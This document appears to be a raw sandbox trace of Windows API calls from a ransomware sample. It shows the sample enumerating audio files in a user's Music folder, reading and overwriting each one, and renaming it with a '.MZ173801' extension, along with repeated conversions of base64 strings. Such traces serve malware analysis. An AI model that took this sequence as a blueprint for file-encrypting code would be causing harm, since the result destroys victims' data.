lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.775] GetCurrentThreadId () returned 0x1358 [0117.775] GetCurrentThreadId () returned 0x1358 [0117.775] GetCurrentThreadId () returned 0x1358 [0117.776] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.776] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.776] GetCurrentThreadId () returned 0x1358 [0117.776] GetCurrentThreadId () returned 0x1358 [0117.776] GetCurrentThreadId () returned 0x1358 [0117.776] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\0L-oxNwdFYy.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\0l-oxnwdfyy.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0117.776] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0117.776] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0117.776] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x165a2 [0117.776] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0117.776] ReadFile (in: hFile=0x404, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x165a2, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f418*=0x165a2, lpOverlapped=0x0) returned 1 [0117.778] CloseHandle (hObject=0x404) returned 1 [0117.779] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\0L-oxNwdFYy.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\0l-oxnwdfyy.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0117.781] WriteFile (in: hFile=0x404, lpBuffer=0x23bc7d0*, nNumberOfBytesToWrite=0x165a2, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x23bc7d0*, lpNumberOfBytesWritten=0x19f424*=0x165a2, lpOverlapped=0x0) returned 1 [0117.783] CloseHandle (hObject=0x404) returned 1 [0118.180] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\0L-oxNwdFYy.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\0l-oxnwdfyy.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\0L-oxNwdFYy.wav.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\0l-oxnwdfyy.wav.mz173801")) returned 1 [0118.182] GetCurrentThreadId () returned 0x1358 [0118.183] GetCurrentThreadId () returned 0x1358 [0118.183] GetCurrentThreadId () returned 0x1358 [0118.183] GetCurrentThreadId () returned 0x1358 [0118.183] GetCurrentThreadId () returned 0x1358 [0118.183] GetCurrentThreadId () returned 0x1358 [0118.183] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f7058e0, ftCreationTime.dwHighDateTime=0x1d5ed30, ftLastAccessTime.dwLowDateTime=0x368b2c00, ftLastAccessTime.dwHighDateTime=0x1d5e163, ftLastWriteTime.dwLowDateTime=0x368b2c00, ftLastWriteTime.dwHighDateTime=0x1d5e163, nFileSizeHigh=0x0, nFileSizeLow=0x92a7, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="cbJumAv3Kocmj1zm.m4a", cAlternateFileName="CBJUMA~1.M4A")) returned 1 [0118.183] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0118.183] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0118.183] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\cbJumAv3Kocmj1zm.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\cbjumav3kocmj1zm.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f7058e0, ftCreationTime.dwHighDateTime=0x1d5ed30, ftLastAccessTime.dwLowDateTime=0x368b2c00, ftLastAccessTime.dwHighDateTime=0x1d5e163, ftLastWriteTime.dwLowDateTime=0x368b2c00, ftLastWriteTime.dwHighDateTime=0x1d5e163, nFileSizeHigh=0x0, nFileSizeLow=0x92a7)) returned 1 [0118.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0118.183] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0118.184] GetCurrentThreadId () returned 0x1358 [0118.184] GetCurrentThreadId () returned 0x1358 [0118.184] GetCurrentThreadId () returned 0x1358 [0118.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0118.184] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0118.184] GetCurrentThreadId () returned 0x1358 [0118.184] GetCurrentThreadId () returned 0x1358 [0118.185] GetCurrentThreadId () returned 0x1358 [0118.185] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\cbJumAv3Kocmj1zm.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\cbjumav3kocmj1zm.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0118.185] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0118.185] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0118.185] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x92a7 [0118.185] SetFilePointer (in: hFile=0x404, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0118.185] ReadFile (in: hFile=0x404, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x92a7, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f418*=0x92a7, lpOverlapped=0x0) returned 1 [0118.186] CloseHandle (hObject=0x404) returned 1 [0118.187] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\cbJumAv3Kocmj1zm.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\cbjumav3kocmj1zm.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x404 [0118.188] WriteFile (in: hFile=0x404, lpBuffer=0x243cc90*, nNumberOfBytesToWrite=0x92a7, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x243cc90*, lpNumberOfBytesWritten=0x19f424*=0x92a7, lpOverlapped=0x0) returned 1 [0118.190] CloseHandle (hObject=0x404) returned 1 [0118.192] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\cbJumAv3Kocmj1zm.m4a" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\cbjumav3kocmj1zm.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\3MH4hI_B2Y4fI4Q-s4O\\cbJumAv3Kocmj1zm.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\3mh4hi_b2y4fi4q-s4o\\cbjumav3kocmj1zm.m4a.mz173801")) returned 1 [0118.195] GetCurrentThreadId () returned 0x1358 [0118.195] GetCurrentThreadId () returned 0x1358 [0118.195] GetCurrentThreadId () returned 0x1358 [0118.195] GetCurrentThreadId () returned 0x1358 [0118.195] GetCurrentThreadId () returned 0x1358 [0118.196] GetCurrentThreadId () returned 0x1358 [0118.196] FindNextFileW (in: hFindFile=0xa1bcb0, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa738b950, ftCreationTime.dwHighDateTime=0x1d5e883, ftLastAccessTime.dwLowDateTime=0x56830880, ftLastAccessTime.dwHighDateTime=0x1d5ee50, ftLastWriteTime.dwLowDateTime=0x56830880, ftLastWriteTime.dwHighDateTime=0x1d5ee50, nFileSizeHigh=0x0, nFileSizeLow=0x6d0f, dwReserved0=0x19f5ac, 